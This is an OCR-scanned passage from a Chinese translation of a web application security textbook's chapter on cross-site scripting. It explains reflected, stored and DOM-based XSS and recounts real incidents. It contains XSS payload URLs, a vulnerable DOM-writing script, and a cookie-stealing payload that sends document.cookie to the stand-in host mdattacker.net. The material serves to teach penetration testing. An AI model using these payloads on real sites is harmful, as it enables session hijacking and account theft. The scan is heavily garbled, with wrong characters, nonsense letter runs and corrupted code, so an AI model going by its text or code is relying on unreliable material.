数量 逐渐 减 小 并 且 变 得 更 加 难以 利用 。 然 而 ， 即 使 是 最 为 注重 安全 的 应 
用 程序 ， 也 仍然 包含 许多 可 轻易 发 现 的 客户 端 缺 陷 。 此 外 ， 应 用 程序 的 
服务 器 端 以 有 限 、 可 控 的 方式 运行 ， 而 客户 端 可 使 用 任意 数量 的 各 种 济 
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许多 年 前 ， 各 种 服务 需 端 漏洞 大 行 其 道 ， 如 今 ， 随 看 人 们 首次 谈 及 
会 话 固定 之 类 的 漏洞 ， 客 户 端 漏洞 开始 成 为 最 近 研 究 的 主要 焦点 。 客 户 
端 攻击 成 为 以 Web 安 全 为 报导 对 象 的 新 闻 媒 体 的 主要 关注 焦点 ， 间 恋 软 
件 、 钓 鱼 攻 击 和 木马 等 名 词 成 为 许多 以 前 从 未 听 说 过 SQL 注 入 或 路 径 亿 
历 的 新 闻 记 者 的 口头 禅 。 针 对 Web 应 用 程序 用 户 的 攻击 也 日 益 成 为 有 利 
可 图 的 犯罪 行为 。 如 果 一 家 因特网 银行 拥有 1000 万 个 用 户 ， 并 且 不 需要 
熟练 的 技能 ， 只 需要 通过 相对 简单 的 攻击 方法 就 可 以 攻破 其 中 1% 的 用 
性， 那 何必 还 要 费 神 去 入 侵 这 家 银行 呢 ? 

针对 其 他 应 用 程序 用 户 的 攻击 形式 各 寞 ， 它 们 之 间 的 微妙 之 处 与 细 
微 莽 别 第 第 被 人 们 忽略 。 通 常 ， 与 主要 的 服务 强 端 攻击 相 比 ， 人 们 对 这 
些 攻击 也 知之 甚 少 ， 即 使 经 验 丰富 的 渗透 测试 员 也 会 混 消 或 忽略 各 种 不 
同 的 漏洞 。 本 章 将 摘 述 各 种 常见 的 漏 将 ， 并 说 明 渗 透 测 试 员 在 确认 并 利 
用 这 些 漏洞 时 所 需 采 取 的 实用 步 又 。 

本 章 主要 介绍 跨 站 点 脚本 XSS) 。 这 类 漏洞 导致 了 针对 其 他 用 户 
的 重量 级 攻击 。 从 某 种 程度 上 说 ，XSS 是 在 web 应 用 程序 中 发 现 的 最 为 
普遍 的 漏洞 ， 困 扰 痢 现在 绝 大 多 数 的 应 用 程序 ， 包 括 因特网 上 一 些 最 为 
注重 安全 的 应 用 程序 ， 如 电子 银行 使 用 的 应 用 程序 。 在 下 一 章 中 ， 我 们 
人 
以 。 





























w 错误 观点 “用 户 之 所 以 被 攻破 ， 是 因为 他 们 没有 安全 意 
Par 

从 某 种 程度 上 说 ， 这 种 观点 是 正确 的 ， 但 是 ， 尽 管用 户 采 取 了 
安全 防御 ， 一 些 针 对 应 用 程序 用 户 的 攻击 仍然 能 够 取得 成 功 。 保 存 
型 XSS 攻 击 能 够 攻破 最 具 安全 意识 的 用 户 ， 而 无 须 与 用 户 进行 任何 
交互 。 在 第 13 章 ， 我 们 将 介绍 许多 其 他 方法 ， 可 在 用 户 不 知情 的 情 
况 下 攻破 具有 安全 意识 的 用 户 。 


最 初 ， 当 XSS 在 Web 应 用 程序 安全 社区 广 为 人 们 所 知 时 ， 一 些 专业 
渗透 测试 人 员 倾 向 于 将 XSS 当 做 一 种 “次 要 ?漏洞 。 这 一 部 分 是 因为 该 漏 
洞 在 Web 应 用 程序 中 极为 常见 ， 也 因为 与 服务 器 端 命令 注入 等 许多 漏洞 
相 比 ，XSS 并 不 能 被 独立 黑客 直接 用 于 攻击 应 用 程序 。 随 着 时 间 的 推 
移 ， 这 种 观点 已 发 生 改 变 ， 如 今 ，XSS 已 被 人 们 视 为 Web 应 用 程序 面临 
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论 各 种 其 他 复杂 性 与 利用 XSS 漏 洞 的 攻击 不 相 上 下 的 攻击 。 与 此 同时 ， 
现实 世界 中 也 出 现 了 大 量 利用 XSS 漏 洞 攻破 知名 机 构 的 攻击 。 

通常 情况 下 ，XSS 是 一 类 主要 的 应 用 程序 安全 缺陷 ， 它 常 第 与 其 他 
漏洞 一 起 造成 破坏 性 的 后 果 。 有 时 ，XSS 攻 击 也 可 能 转变 成 某 种 病毒 或 
能 够 自我 繁殖 的 蠕虫 ， 这 种 攻击 确实 非 第 严重 。 














v 错误 观点 “不 可 能 通过 XSS 控 制 一 个 web 应 用 程序 。” 

我 们 曾 仅 使 用 XSS 攻 击 控制 大 量 的 应 用 程序 。 在 适当 的 情况 
下 ， 技 术 熟 练 的 攻击 者 利用 XSS 漏 洞 即 可 完全 攻破 一 个 应 用 程序 。 
下 面 将 说 明 攻 击 者 如 何 实施 攻击 。 


12.1 XSS 的 分 类 


XSS 漏 洞 表 现 为 各 种 形式 ， 并 且 可 分 为 3 种 类 型 ， 反射 型 、 保 存 型 





和 基于 DOM 的 XSS 漏 洞 。 虽 然 这 些 漏洞 具有 一 些 相 同 的 特点 ， 但 在 如 何 
确定 及 利用 这 些 漏 洞 方面 ， 仍 然 存 在 一 些 重要 的 差异 。 下 面 我 们 将 分 别 
介绍 每 一 类 XSS 漏 洞 。 





如 采 一 个 应 用 程序 使 用 动态 页 面 癌 用 户 显 示 错 误 消 息 ， 就 会 造成 一 
种 常见 的 XSS 漏 洞 。 通 党 ， 该 页 面 会 使 用 一 个 包含 消 妃 文本 的 参数 ， 并 
在 啊 应 中 将 这 个 文本 返回 给 用 户 。 对 于 开发 者 而 言 ， 使 用 这 种 机 制 非常 
方便 ， 因 为 它 允 许 他 们 从 应 用 程序 中 调用 一 个 定制 的 错误 页 面 ， 而 不 需 














要 对 错误 页 面 中 的 消息 分 别 进行 硬 编码 。 
例如 ， 下 面 的 URL 返 回 如 图 12-1 所 示 的 错误 消息 : 
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图 12-1 一 条 动态 生成 的 错误 消息 


= 


http: //mdsec.net/error/5/Brror.asnx?message=Sorry%2crantrerrortoccurred 


分 析 返 回 页 面 的 HTML 源 代 码 后 ， 我 们 发 现 ， 应 用 程序 只 是 简单 复 
a a a 
面 模板 中 : 


<p>Sorry, an error occurred.</p> 
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施 ， 那 么 它 很 容易 受到 攻击 。 让 我 们 来 看 看 如 何 实施 攻击 。 

下 面 的 URL 经 过 专门 设计 ， 它 用 一 段 生 成 弹出 对 话 框 的 JavaScript 代 
码 代 答 错误 消息 : 


http: //mdsec.net/error/5/Error.ashx?message=<script>alert (1)</seript> 


请 求 这 个 URL 将 会 生成 个 HTML 页面， 其 中 包含 以 下 蔡 代 原 台 消 
EY AR: 
<p><script>alert (1) ;</script></p> 
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现 ， 如 图 12-2 所 示 。 
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图 12-2 er 
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数 的 内 容 可 用 任何 返回 给 浏览 器 的 数据 奉 代 ; 其 次 ， 无 论 服务 器 * in AL 
程序 如 何 处 理 这 些 数据 〈 如 果 有 ) ， 都 无 法 阻止 提交 JavaScript 代 码 ， 

旦 错误 页 面 在 浏览 占 中 显示 ， 这 些 代 人 码 就 会 执行 。 


A IF 


http://mdsec.net/error/5/ 


-> 注解 ”如 果 在 Internet Explorer 中 尝试 这 样 的 示例 ， 弹 出 窗 
口 可 能 无 法 显示 ， 浏 览 右 可 能 会 显示 以 下 消息 :“ 为 帮助 阻止 跨 站 
点 脚本 ，Internet Explorer 已 修改 此 页 面 。” 这 是 因为 最 新 版 本 的 
Internet Explorer 包 含 一 个 旨 在 帮助 用 户 防 范 反 射 型 XSS 漏 洞 的 内 置 
机 制 。 如 果 要 测试 这 些 示例 ， 可 以 尝试 使 用 其 他 未 使 用 这 种 保护 机 
制 的 浏览 器 ， 或 者 通过 以 下 方式 禁用 XSS 沪 选 器 : “LA” > 
“Internett N — “ZE” > “上 自 定 义 级 别 ”， 在 “启用 XSS 往 选 器 ”下 
选择 “禁用 ”。 我 们 将 在 本 章 后 面部 分 讨论 XSS 科 选 器 的 工作 机 制 ， 
VA Be ae FP IK PP ae AS TE o 


FED SET FP Web hy HIET EE XSS HA, A75% JR 
于 这 种 简单 的 XSS bugs HF AAS XE lel m BAB PL KA 
JavaScriptt iS ie, BEJE HERS SS BE AT FE He OKA , 
A TE BPR TE SN AEXSS 2 Boo A AERE 7 Fil HI Es ob 5 
应 进行 传送 和 执行 。 为 此 ， 有 时 它 也 被 称 为 一 阶 XSS。 

利用 漏洞 

下 文 将 会 介绍 ， 利 用 XSS 漏 洞 攻击 应 用 程序 其 他 用 户 的 方式 有 很 多 
种 。 最 简单 的 一 种 攻击 ， 也 是 我 们 常用 于 次 明 XSS 漏 洞 沫 在 影响 的 一 种 
攻击 ， 可 导致 攻击 者 截获 通过 验证 的 用 户 的 会 话 令 牌 。 劫 持 用 户 的 会 话 
后 ， 攻 击 者 就 可 以 访问 该 用 户 经 授权 访问 的 所 有 数据 和 功能 《参见 第 7 
章 ) 。 实 施 这 种 攻击 的 步骤 如 图 12-3 所 示 。 














5. 攻击 者 的 JavaScript Sn 

在 用 户 的 浏览 器 中 执行 ”= 2. 攻 击 者 将 他 自己 淮 备 的 URL 提 交 给 客户 。 sg 者 
a 6. 用 户 的 浏览 器 向 攻击 者 发 送 会 话 令 牌 CS 
用 户 攻击 者 





图 12-3 ”反射 型 XSS 攻 击 的 实施 步骤 





(1〉 用 户 正 常 登 录 应 用 程序 ， 得 到 一 个 包含 会 话 令 牌 的 cookie: 
Set-Cookie: sId=184a9138ed372742018a409672262 £124590c2a652491a3 


(2) 攻击 着 通过 革 种 方法 《详情 见 下 文 ) 回 用 户 提交 以 下 URL: 


http: //mdsec.net/error/5/Error.ashx?message=<script>var+i=new- Image 





i+i.src-"http://mdattracker.net/"t$2pdocument .cookie;</script> 


和 前 面 生 成 一 个 对 话 框 消息 的 示例 一 样 ， 这 个 URL 包 含 J 
JavaScript 代 码 。 但 是 ， 这 个 示例 中 的 攻击 有 效 载荷 更 加 恶毒 

(3) 用 户 从 应 用 程序 中 请 求 攻击 者 传送 给 他 们 的 URL。 

(4) 服务 器 啊 应 用 户 的 请 求 。 由 于 应 用 程序 中 存在 XSS 漏 洞 ， 咯 
应 中 包含 攻击 者 创建 的 JavaScript 代码 。 

(5) 用 户 浏览 器 收 到 攻击 者 的 JavaScript 代 码 ， 像 执行 从 应 用 程序 
收 到 的 其 他 代码 一 样 ， 浏 览 占 执行 这 段 代 码 。 

(6) 攻击 者 创建 的 恶意 JavaScript 代 码 为 : 


var i=new image; i.src="http://mdattacker.net/*+document.cookie; 


这 段 代 码 可 让 用 户 浏览 器 向 mdattacker.net (攻击 者 拥有 的 一 个 域 ) 
提出 一 个 请 求 。 请 求 中 包含 用 户 访问 应 用 程序 的 当前 会 话 令 牌 : 


GET /sessid=184a9138ed37374201a4c9672362£12459c2a652491a3 HITP/1.1 
Eost: mdattacker.net 


(7) 攻击 者 监控 访问 mdattacker.net 的 请 求 并 收 到 用 户 的 请 求 。 攻 
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并 “代表 ”该 用 户 执 行 任意 操作 。 


eo 

a 

> 注解 第 6 章 已 经 介绍 过 ， 一 些 应 用 程序 保存 一 个 持久 性 
cookie， 以 在 用 户 每 次 访问 时 重新 对 其 进行 有 效 验 证 ， 例 如 ， 执 
行 “ 记 住 我 功能。 这 时 ， 就 没有 必要 执行 上 述 过 程 中 的 第 一 个 步 
又 。 即 使 目标 用 户 并 未 处 于 活动 状态 或 登录 应 用 程序 ， 攻 击 者 仍然 
能 够 成 功 实现 目标 。 为 此 ， 以 这 种 方式 使 用 cookie 的 应 用 程序 更 易 
受到 XSS 漏 洞 的 影响 。 


完成 上 述 步骤 后 ， 读 者 可 能 会 心 存 疑惑 : 如 果 攻 击 者 能 够 诱 使 用 户 
访问 他 选择 的 URL， 那 么 他 为 什么 还 要 费 这 么 大 力气 通过 应 用 程序 中 的 
XSS 漏 洞 传送 自己 的 恶意 JavaScript 代 码 呢 ? 为 什么 他 不 在 mdattacker.net 
上 保存 一 段 恶意 脚本 ， 并 回 用 户 传 送 一 个 直接 指 同 这 段 脚 本 的 链接 呢 ? 
这 段 脚 本 不 是 可 以 和 上 例 中 的 脚本 一 样 执行 吗 ? 

要 了 解 攻击 者 为 什么 需要 利用 XSS 漏 洞 ， 需 要 回顾 第 3 章 介 绍 的 同 
源 策 略 。 为 防止 不 同 域 在 用 户 浏 览 器 中 彼此 干扰 ， 浏 览 右 对 从 不 同 来 源 

《 域 ) 收 到 的 内 容 进 行 隔离 。 攻 击 者 的 目的 不 是 单纯 地 执行 任意 脚本 ， 
而 是 截获 用 户 的 会 话 令 牌 。 浏 览 器 不 允许 任何 旧 有 脚本 访问 一 个 站 点 的 
cookie， 人 和 否则， 会 话 就 很 容易 被 劫持 。 而 且 ， 只 有 发 布 cookie 的 站 点 能 
够 访问 这 些 cookie: 仅 在 返回 发 布 站 点 的 HTTP 请 求 中 提交 cookie ; 只 有 
通过 该 站 点 返回 的 页 面 所 包含 或 加 载 的 JavaScript 才 能 访问 cookie。 
此 ， 如 果 mdattacker.net 上 的 一 段 脚 本 查询 document.cookie， 它 将 无 法 获 
得 mdsec.net 发 布 的 cookie， 动 持 攻 击 也 不 会 成 功 。 

就 用 户 的 浏览 器 而 言 ， 利 用 XSS 漏 洞 的 攻击 之 所 以 取得 成 功 ， 是 因 
为 攻击 者 的 恶意 JavaScript 是 由 mdsec.net 送 交 给 它 的 。 当 用 户 请 求 攻击 者 
的 URL 时 ， 浏 览 器 问 http://mdsec.net/error/5/Error.ashx 提 交 一 个 请 求 ， 然 
后 应 用 程序 返回 一 个 包含 一 段 JavaScript 的 页 面 。 和 从 mdsec.net 收 到 的 任 
何 JavaScript 一 样 ， 浏 览 器 执行 这 段 脚本 ， 因 为 用 户 信 任 mdsec.net。 这 也 
就 是 为 何 攻击 的 脚本 能 够 访问 mdsec.net 发 布 的 cookie 的 原因 ， 虽 然 它 实 
际 来 自 其 他 地 方 。 这 也 是 为 何 该 漏洞 被 称 作 路 站 点 脚本 的 原因 。 














另 一 种 常见 的 XSS 漏 洞 叫做 保存 型 跨 站 点 脚本 。 如 果 一 名 用 户 提 区 


的 数据 被 保存 在 应 用 程序 中 《通常 保存 在 一 个 后 端 数据 库 中 ) ， 然 后 不 
经 适当 过 小 或 净化 束 显 示 给 其 他 用 户 ， 此 时 就 会 出 现 这 种 漏洞 。 

在 文 持 终 端 用 户 交 互 的 应 用 程序 中 ， 或 者 在 具有 管理 权限 的 员工 访 
问 同一 个 应 用 程序 中 的 用 户 记 录 和 数据 的 应 用 程序 中 ， 保 存 型 XSS 漏 洞 
很 常见 。 例 如 ， 以 一 个 拍卖 应 用 程序 为 例 ， 它 允许 买 家 提出 与 某 件 商 品 
有 关 的 问题 ， 然 后 由 卖家 回答 。 如 果 一 名 用 户 能 够 提出 一 个 包含 租 入 式 
JavaScript 的 问题 ， 而 且 应 用 程序 并 不 过 滤 或 净化 这 个 JavaScript， 那 么 
攻击 者 就 可 以 提出 一 个 专门 设计 的 问题 ， 在 任何 查看 该 问题 的 用 户 〈 包 
括 卖 家 和 潜在 的 买 家 ) 的 浏览 器 中 执行 任意 脚本 。 在 这 种 情况 下 ， 攻 击 
者 就 可 让 不 知情 的 用 户 去 竞标 一 件 他 不 想 要 的 两 品 ， 或 者 让 一 位 卖家 接 
受 他 提出 的 低 价 ， 结 束 苋 标 。 

一 般 情 况 下 ， 利 用 保存 型 XSS 漏 洞 的 攻击 至 少 需要 回应 用 程序 提出 
两 个 请 求 。 攻 击 者 在 第 一 个 请 求 中 传送 一 些 专门 设计 的 数据 ， 其 中 包含 
恶意 代码 ， 应 用 程序 接受 并 保存 这 些 数据 。 在 第 二 个 请 求 中 ， 一 名 受害 
者 查看 某 个 包含 攻击 者 的 数据 的 页 面 ， 这 时 恶意 代码 开始 执行 。 为 此 ， 
这 种 漏洞 有 时 也 叫做 三 阶 跨 站 点 脚本 。 在 这 个 示例 中 ， 使 用 XSS 实 际 
上 并 不 准确 ， 因 为 攻击 中 没有 路 站 点 元 素 。 但 由 于 这 个 名 称 被 人 们 广泛 
使 用 ， 因 此 我 们 在 这 里 仍然 沿用 它 。) 

图 12-4 说 明了 一 名 攻击 者 如 何 利用 保存 型 XSS 漏 洞 ， 实 施 上 述 利用 
反射 型 XSS 漏 洞 实施 的 相同 会 话 支持 攻击 。 




















5. 攻击 者 的 JavaSeript ee i a eee eae 
在 用 户 的 浏览 回 中 执行 6. 用 户 的 浏览 器 癌 攻 击 者 发 送 会 话 令 牌 
aft ' 5 1 





图 12-4 ”保存 型 XSS 漏 洞 的 实施 步骤 





尝试 访问 

本 示例 包含 一 项 搜索 功能 ， 可 用 于 显示 当前 用 户 输 入 的 查询， 
以 及 其 他 用 户 最 近 输 入 的 查询 列表 。 由 于 查询 将 按 原样 显示 ， 应 用 
a re ee 
BE A o 

http://mdsec.net/search/11/ 


反射 型 与 保存 型 XSS 攻 击 在 实施 步骤 上 存在 两 个 重要 的 区 别 ， 这 也 
使 得 后 者 往往 造成 更 大 的 安全 威胁 。 

先 ， 在 反射 型 XSS 脚 本 攻击 中 ， 要 利用 一 个 漏洞 ， 攻 击 者 必须 以 
某 种 方式 诱 使 受害 者 访问 他 专门 设计 的 URL。 而 保存 型 XSS 脚 本 攻击 则 
没有 这 种 要 求 。 在 应 用 程序 中 展开 攻击 后 ， 攻 击 者 只 需要 等 待 受 害 者 浏 
览 已 被 攻破 的 页 面 或 功能 。 通 常 ， 这 个 页 面 是 一 个 正常 用 户 将 会 主动 访 
问 的 常规 页 面 。 

其 次 ， 如 果 受 害 者 在 遭受 攻击 时 正在 使 用 应 用 程序 ， 攻 击 者 就 更 容 
易 实 现 其 利用 XSS 漏 洞 的 目的 。 例 如 ， 如 果 用 户 当 前 正在 进行 会 话 ， 那 
么 攻击 者 就 可 以 劫持 这 个 会 话 。 在 反射 型 XSS 攻 击 中 ， 攻 击 者 可 能 会 说 
服用 户 登 录 ， 然 后 单 击 他 们 提供 的 一 个 链接 ， 从 而 制造 这 种 情况 。 或 者 
他 可 能 会 部 署 一 个 永久 性 的 有 效 载荷 并 等 竺 用户 登 录 。 但 是 ， 在 保存 型 
XSS 攻 击 中 ， 攻 击 者 能 够 保证 ， 受 害 用 户 在 他 实施 攻击 时 已 经 在 访问 应 
用 程序 。 因 为 攻击 有 效 载 荷 被 保存 在 用 户 自 主 访问 的 一 个 应 用 程序 页 面 
中 ， 所 以 ， 当 有 效 载荷 执行 时 ， 任 何 攻 击 受害 者 都 在 使 用 应 用 程序 。 而 
且 ， 如 果 上 述 页 面 位 于 应 用 程序 通过 验证 的 区 域内 ， 那 么 那 时 攻击 受害 
者 一 定 已 经 登录 。 

反射 型 与 保存 型 XSS 攻 击 之 间 的 这 些 区 别 意味 着 保存 型 XSS 漏 洞 往 
往 会 给 应 用 程序 带 来 更 严重 的 安全 威胁 。 许 多 时 候 ， 攻 击 者 可 以 向 应 用 
程序 提交 一 些 专门 设计 的 数据 ， 然 后 等 待 受害 者 访问 它们 。 如 果 其 中 一 
名 受害 者 是 管理 员 ， 那 么 攻击 者 就 能 够 完全 攻破 整个 应 用 程序 。 






































反射 型 和 保存 型 XSS 漏 洞 都 表现 出 一 种 特殊 的 行为 模式 ， 其 中 应 用 
程序 提取 用 户 控制 的 数据 并 以 危险 的 方式 将 这 些 数据 返回 给 用 户 。 第 三 





类 XSS 漏 洞 并 不 具有 这 种 特点 。 在 这 种 漏洞 中 ， 攻 击 者 的 JavaScript 通 过 
以 下 过 程 得 以 执行 。 

口 用 户 请 求 一 个 经 过 专门 设计 的 URL， 它 由 攻击 者 提交 ， 且 其 中 包 
SA JavaScript. 

口服 务 器 的 啊 应 中 并 不 以 任何 形式 包含 攻击 者 的 脚本 。 

a p A 的 浏览 器 处 理 这 个 响应 时 ， 上 述 脚 本 得 以 处 理 。 

一 系列 事件 如 何 发 生 呢 ?” 由 于 客户 问 JavaScript 可 以 访问 浏览 器 的 

文本 对 象 模型 (Document Object Model, DOM) ， 因 此 它 能 够 决定 用 
于 加 载 当前 页 面 的 URL。 由 应 用 程序 发 布 的 一 段 脚本 可 以 从 URL 中 提取 
数据 ， 对 这 些 数 据 进 行 处 理 ， 然 后 用 它 动 态 更 新 页 面 的 内 容 。 如 果 这 
样 ， 应 用 程序 就 可 能 易于 受到 基于 DOM 的 XSS 攻 击 。 

回 到 前 面 的 反射 型 XSS 漏 洞 中 的 示例 ， 其 中 服务 器 端 应 用 程序 将 一 
个 URL 参 数值 复制 到 一 条 错误 消息 中 。 男 一 种 实现 相同 功能 的 办 法 是 由 
P ses 返回 相同 的 静态 HTML， 并 使 用 客户 端 JavaScript 动 态 生成 
` P 

例如 ， 假 设 应 用 程序 返回 的 错误 页 面包 含 以 下 脚本 : 


«script> 








var url = document. location; 

url = unescape(url); 

var message = url.substring{url.incdexOf('message=') + 4, url 
. Length) ; 

document.write (message); 
</script> 


这 段 脚 本 解析 URL， 提 取出 message 参 数 的 值 ， 并 把 这 个 值 写 入 页 
面 的 HTML 源 代码 中 。 如 果 按 开发 者 预想 的 方式 调用 ， 它 可 以 和 前 面 的 
示例 中 一 样 ， 用 于 创建 错误 消息 。 但 是 ， 如 果 攻 击 者 设计 出 一 个 URL， 
并 以 JavaScript 代 人 码 作 为 message 参 数 ， 那 么 这 段 代 码 将 被 动态 写 入 页 面 
中 ， 并 像 服务 器 返回 代码 一 样 得 以 执行 。 在 这 个 示例 中 ， 前 面 示例 中 利 
es ee E a 


http misec.net/error/18/Error.ashx?message=<script>alert('xss')</script> 





尝试 访问 
http://mdsec.net/error/18/ 
利用 基于 DOM 的 XSS 漏 洞 的 过 程 如 图 12-5 所 示 。 





> 2. 攻 击 着 将 他 自己 准备 的 URL 回 铺 给 用 户 gale 
5. 攻击 者 的 URL 由 JavaSeript ET RTS EPG 
处 理 ， 引 发 其 攻击 有 效 载 荣 6. 用 户 的 浏览 器 向 攻击 者 发 送 会 话 令 牌 “i 





图 12-5 ”基于 DOM 的 XSS 攻 击 的 实施 步 又 


与 保存 型 XSS 漏 洞 相 比 ， 基 于 DOM 的 XSS 漏 洞 与 反射 型 XSS 漏 洞 有 
更 大 的 相似 性 。 利 用 它们 通常 需要 攻击 者 诱 使 一 名 用 户 访问 一 个 包含 恶 
意 代码 的 专门 设计 的 URL， 并 由 服务 器 啊 应 那个 确保 得 恶意 代码 得 以 执 
行 的 特殊 请 求 。 但 是 ， 在 利用 反射 型 与 基于 DOM 的 XSS 漏 洞 的 细节 方 
面 ， 还 存在 一 些 重要 的 差异 ， 这 点 我 们 在 稍 后 讨论 。 








12.2 ”进行 中 的 XSSI 


要 了 解 XSS 漏 洞 导致 的 严重 后 果 ， 有 必要 分 析 一 些 真 实 的 XSS 攻 击 
示例 ， 这 有 助 于 我 们 了 解 XSS 攻 击 能 够 执行 的 各 种 恶意 操作 ， 以 及 如 何 
针对 受害 者 实施 这 类 攻击 。 











12.2.1 实 XSSI 


2010 年 ，Apache Foundation 被 攻击 者 利用 其 问题 追踪 应 用 程序 中 的 
漏洞 、 通 过 反射 型 XSS 攻 击 攻破 。 首 先 ， 攻 击 者 发 布 一 个 使 用 重 定向 服 
务 进 行 模糊 处 理 的 链接 ， 该 链接 指向 一 个 利用 上 述 XSS 漏 洞 获 取 登 录用 
户 的 会 话 令 牌 的 URL。 如 果 管 理 员 单 击 该 链接 ， 他 的 会 话 将 被 攻破 ， 攻 
击 者 将 获得 对 应 用 程序 的 管理 访问 权限 。 然 后 ， 攻 击 者 修改 某 个 项 目的 
设置 ， 将 该 项 目的 上 传 文件 夹 更 改 为 应 用 程序 的 Web 根 目录 中 的 可 执行 
目录 。 随 后 ， 攻 击 者 向 此 文件 夹 上 传 一 个 木马 登录 表单 ， 从 而 获取 特权 
用 户 的 用 户 名 和 密码 。 通 过 这 种 方法 ， 攻 击 者 确定 一 些 在 基础 架构 的 其 
Nh BSP HR EASES, PTE BIR Aa, Bary la He BI] 
受 攻击 的 Web 应 用 程序 之 外 。 

有 关 此 次 攻击 的 详情 ， 请 参阅 以 下 URL: 


http: //blogs.apache.org/infra/entry/apache_org_04_09_2010 


2005 年 ， 发 现 社交 网 络 站 点 MySpace 易 于 受到 保存 型 XSS 攻 击 。 虽 
然 MySpace 的 应 用 程序 实施 了 过 滤 ， 防 止 用 户 在 他 们 的 用 户 资料 页 面 舱 
入 JavaScript 脚 本 ， 但 是 ， 一 位 名 叫 Samy 的 用 户 找 到 了 一 种 避 开 这 些 过 
滤 的 方法 ， 并 在 用 户 资 料 页 面 中 插入 了 一 些 JavaScript 脚 本 。 如 有 果 一 名 用 
户 查 看 他 的 用 户 资 料 ， 这 段 脚 本 就 会 执行 ， 守 致 受害 者 的 浏览 器 执行 各 
种 操作 。 这 束 造 成 了 两 个 严重 后 果 : 首先 ， 它 把 Samy 加 为 受害 者 的 “ 朋 
友 ” 其 次 ， 它 把 上 述 脚 本 复制 到 受害 者 自己 的 用 户 资 料 页 面 中 ， 
此 ， 任 何人 查看 受害 者 用 户 资 料 的 用 户 也 会 成 为 这 次 攻击 的 受害 者 。 结 
果 ， 一 个 基于 XSS 的 蠕虫 在 因特网 上 迅速 扩散 ， 几 小 时 内 ，Samy 收 到 了 
近 100 万 个 朋友 邀请 。 为 此 ，MySpace 被 迫 关 闭 它 的 应 用 程序 ， 从 所 有 
用 户 的 资料 中 删除 恶意 脚本 ， 并 修复 反 XSS 过 滤 机 制 中 的 缺陷 。 

有 关 此 次 攻击 的 详细 信息 ， 请 参阅 以 下 URL: 

http://namb.la/popular/tech.html 

当 收 件 人 查阅 电子 邮件 时 ， 邮 件 内 容 在 浏览 旨 中 显示 ; Web 邮 件 应 























用 程序 的 这 种 行为 本 身 就 存在 着 保存 型 XSS 攻 击 风险 。 电 子 邮件 中 可 能 
包含 HTML 格 式 的 内 容 ， 因 此 应 用 程序 会 立即 将 第 三 方 HTML 复 制 到 问 
用 户 显示 的 页 面 中 。2009 年 ， 一 家 名 为 SttongWebmail 的 Web 邮 件 提供 

商 悬 赏 1 万 美元 ， 征 询 能 够 侵入 其 CEO 电 子 邮 件 的 黑客 。 最 终 ， 黑 客 在 
该 Web 邮 件 应 用 程序 中 发 现 一 个 保存 型 XSS 漏 洞 ， 如 果 收 件 人 查看 恶意 
电子 邮件 ， 黑 客 就 可 以 执行 任意 JavaScript。 于 是 ， 黑 客 们 向 该 CEO 发 送 
了 一 份 恶意 电 子 邮 作 ， 攻破 了 他 在 应 用 程序 上 的 会 话 ， 从 而 赢得 了 赏 


To 
有 关 此 次 攻击 的 详细 信息 ， 请 参阅 以 下 URL: 
http://blogs.zdnet.com/security/?p=3514 
2009 年 ，Twitter 成 为 了 两 个 XSS 晴 虫 的 受害 者 ， 这 两 个 晴 虫 利用 保 

存 型 XSS 漏 洞 在 Twitter 用 户 间 进行 传播 ， 并 发 布 推 文 来 宣传 蠕虫 作者 的 

网 站 。 人 们 还 在 Twitter 中 发 现 各 种 基于 DOM 的 XSS 漏 洞 ， 这 主要 是 因为 

它 在 客户 兽 大 量 使 用 类 似 于 Ajax 的 代码 所 致 。 

有 关 这 些 漏洞 的 详细 信息 ， 请 参阅 以 下 URL: 

www.cgisecurity.com/2009/04/two-xss-worms-slam-twitter.html 

http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix- 
andsomething.html 











12.2.2 XSS! DEE 


SAE, RINCAB AA T RE RXSSHRA ANER, WOR 
一 名 受害 者 的 会 话 令 牌 ， 劫 持 他 的 会 话 ， 进 而 “作为 ”受害 者 使 用 应 用 程 
序 ， 执 行 任意 操作 并 占有 该 用 户 的 账户 。 实 际 上 ， 还 有 其 他 大 量 的 攻击 
有 效 载 奏 可 通过 任何 类 型 的 XSS 漏 洞 传送 。 

1. 虚拟 置换 

这 种 攻击 需要 在 一 个 Web 应 用 程序 页 面 注入 恶意 数据 ， 从 而 同 应 用 
程序 用 户 传送 误导 性 信息 。 它 包括 简单 加 站 点 中 注入 HTML 标 记 ， 或 者 
使 用 脚本 (有 时 保存 在 外 部 服务 器 上 ) 在 站 点 中 注入 精心 设计 的 内 容 和 
导航 。 这 种 攻击 被 称 为 虚拟 置换 (virtual defacement) ， 因 为 攻击 者 实 
际 上 并 没有 修改 保存 在 目标 Web 服 务 嚣 上 的 内 容 ， 而 是 利用 应 用 程序 处 
理 并 显示 用 户 提交 的 输入 方面 的 缺陷 实现 置换 。 

除 造 成 无 关 紧 要 的 损害 外 ， 这 种 攻击 也 可 用 于 严重 的 犯罪 活动 中 。 
一 个 专门 设计 的 置换 ， 如 果 以 可 信 的 方式 传送 给 适当 的 接受 者 ， 可 能 会 
被 新 闻 媒 体 报 导 ， 对 人 们 的 行为 、 股 票 价 格 等 造成 重大 影响 ， 从 而 帮助 
攻击 者 从 中 获得 经 济 利 益 ， 如 图 12-6 所 示 。 
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图 12-6 一 次 利用 XSS 漏 洞 的 虚拟 置换 攻击 


2. 注入 木马 功能 

这 种 攻击 造成 的 后 果 远 比 虚 拟 置 换 严 重 ， 它 在 易 受 攻击 的 应 用 程序 
中 注入 实际 运行 的 功能 ， 则 在 欺骗 终端 用 户 执 行 某 种 有 害 操 作 (如 输入 
敏感 数据 ) ， 随 后 将 它们 传送 给 攻击 者 。 

在 一 个 明显 的 攻击 中 ， 攻 击 者 注入 的 功能 向 用 户 显示 一 个 木马 登录 
表单 ， 要 求 他 们 同 攻击 者 控制 的 服务 器 提交 他 们 上 自己 的 证 书 。 如 果 由 技 
巧 熟练 的 攻击 者 实施 ， 这 种 攻击 还 允许 用 户 无 颖 登录 到 真正 的 应 用 程序 
中 ， 确 保 他 们 不 会 发 觉 访问 过 程 中 的 任何 反常 情况 。 然 后 ， 攻 击 者 就 可 
以 自由 使 用 受害 者 的 证 书 实现 自己 的 目的 。 这 种 类 型 的 有 效 载荷 非常 适 
于 用 在 钓鱼 攻击 中 ， 丫 用 户 传送 一 个 经 过 专门 设计 、 连 接 可 信 应 用 程序 
的 URL， 并 要 求 他 们 正常 登录 以 访问 这 个 URL。 

另 一 种 明显 的 攻击 是 以 某 种 有 吸引 力 的 条 件 为 诱饵 ， 要 求 用 户 输入 
